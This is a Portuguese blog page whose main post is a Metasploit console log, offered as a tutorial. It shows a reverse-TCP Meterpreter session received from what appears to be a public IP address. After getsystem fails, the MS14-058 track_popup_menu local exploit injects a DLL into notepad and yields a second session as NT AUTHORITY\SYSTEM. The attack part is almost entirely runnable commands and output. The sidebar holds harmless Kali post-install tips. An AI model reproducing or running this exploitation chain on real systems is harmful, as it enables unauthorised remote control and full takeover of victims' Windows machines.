Pular para o conteúdo principal

Windows privilege escalation exploit (track_popup_menu)

[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.3:7000
[*] Starting the payload handler...
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 179.197.253.231
[*] Meterpreter session 1 opened (192.168.1.3:7000 -> 179.197.253.231:49233) at 2016-02-01 14:15:22 -0600

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: MsTutorial-PC\Ms Tutorial
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter >
Background session 1? [y/N]

Start Privilege Here

msf exploit(handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.1.3:4444
[*] Launching notepad to host the exploit...
[+] Process 1080 launched.
[*] Reflectively injecting the exploit DLL into 1080...
[*] Injecting exploit into 1080...
[*] Exploit injected. Injecting payload into 1080...
[*] Payload injected. Executing exploit...
[*] Sending stage (957487 bytes) to 192.168.1.4
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.4:49234) at 2016-02-01 14:17:08 -0600

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > visit my channel Ms Tutorial and my Blogger mstutorial

Comentários

Postar um comentário

Postagens mais visitadas deste blog

pós-Instalação kali Linux - Instalando ARCH THEME

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 2 - Instalando ARCH THEME   Comando $ echo 'deb http://download.opensuse.org/repositories/home:/Horst3180/Debian_8.0/ /' >> /etc/apt/sources.list.d/arc-theme.list $ wget http://download.opensuse.org/repositories/home:Horst3180/Debian_8.0/Release.key $ apt-key add - < Release.key $ apt-get update $ apt-get install arc-theme Fonte: https://software.opensuse.org/download.html?project=home%3AHorst3180&package=arc-theme
Postar um comentário
Leia mais

pós-Instalação kali Linux - apt-get update && apt-get upgrade

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 1 - Atualização do sistema, segui o video abaixo: Informações extras gedit é o editor oficial de texto plano para o GNOME. Ele assemelha-se, a princípio, com o bloco de notas do Windows, mas observando os detalhes pode-se notar que possui mais recursos. Como por exemplo: Numeração de linhas. Fonte : https://pt.wikipedia.org/wiki/Gedit source.list : Um arquivo muito importante para o sistema APT de Debian é /etc/apt/sources.list. Neste arquivo são indicadas as fontes de onde serão obtidos os pacotes de software a serem instalados no sistema. Fonte : http://www.tutoriaisti.com.br/sistemas-operacionais/linux/debian-arquivos-sources-list/ source.list Kali Linux http://docs.kali.org/general-use/kali-linux-sources-list-repositories apt-get update - Atualiza a lista de pacotes e programas que podem ser insta...
Postar um comentário
Leia mais

pós-Instalação kali Linux - VLC error - Adobe FlashPlayer

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 4 - Corrigindo error VLC + Instalndo AdobeFlashPlayer Comando para o corrigir o VLC $ sed -i 's/geteuid/getppid/' /usr/bin/vlc Comando para AdobeFlashPlayer $ tar -xf flash_player_npapi_linux.x86_64.tar.gz $ ls $  mv  LGPL /usr/lib/mozilla/plugins/ $  mv  libflashplayer.so /usr/lib/mozilla/plugins/ $  mv  usr /usr/lib/mozilla/plugins/ $  ls /usr/lib/mozilla/plugins/ Reiniciar o navegador e Pronto
Postar um comentário
Leia mais